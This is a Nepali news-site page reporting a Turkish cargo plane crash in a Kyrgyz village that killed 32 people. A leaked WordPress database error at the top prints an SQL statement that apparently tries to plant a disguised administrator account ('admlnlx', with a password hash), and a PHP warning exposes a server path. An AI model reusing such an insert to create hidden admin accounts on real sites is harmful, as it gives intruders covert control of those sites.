WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS/KVjMDkgFK0dVd3E6gEQaPu76.nG/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 08:45:23', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
किर्गिजस्तानमा टर्कीको मालबाहक विमान गाउँमा दुर्घटना हुँदा बत्तीस व्यक्तिको मृत्यु – Gaule Khabar

किर्गिजस्तानमा टर्कीको मालबाहक विमान गाउँमा दुर्घटना हुँदा बत्तीस व्यक्तिको मृत्यु

किर्गिजस्तानमा टर्कीको मालबाहक विमान गाउँमा दुर्घटना हुँदा बत्तीस व्यक्तिको मृत्यु

किर्गिजस्तान, माघ ३-

किर्गिजस्तानको प्रमुख विमानस्थल नजिकै सोमबार एक मालबाहक विमान दुर्घटनामा पर्दा ३२ व्यक्तिको मृत्यु भएको र मर्नेमा चार विमानचालक पनि परेको जानकारी अधिकारीहरूले दिएका छन् । उक्त विमान बाक्लो कुहिरोबीच अवतरण गर्न खोजिँदा जनघनत्व भएको क्षेत्रमा दुर्घटना भएको उनीहरूले बताएका छन् ।

उक्त विमान स्थानीय समय अनुसार बिहानको ७ः३० बजे डाचा–सु गाउँमा दुर्घटनामा परेको किर्गिजस्तानका आपत्कालीन सेवा मन्त्रालयका एक प्रवक्ताले बताए । मर्नेमा प्रायः सोही गाउँका वासिन्दा भएको जानकारी दिइएको छ । टर्किस एयरलाइन्सको उक्त विमान हङकङबाट किर्गिजस्तानको राजधानी बिस्केक हुँदै इस्तानबुृलतर्फ उडेको थियो ।

दुर्घटनामा १५ घर क्षतिग्रस्त भएको आपत्कालीन सेवा मन्त्रालयले उल्लेख गरेको छ । मन्त्रालयले दुर्घटनाका कारण आगो लागेको र हाल त्यसलाई नियन्त्रणमा लिइएको बताइएको छ ।

मुलुकको मानस विमानस्थल बन्द गरिएको र साँझसम्मका लागि उडान रद्द गरिएको विमानस्थलका अधिकारीहरूले बताए । -रासस/एएफपी

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका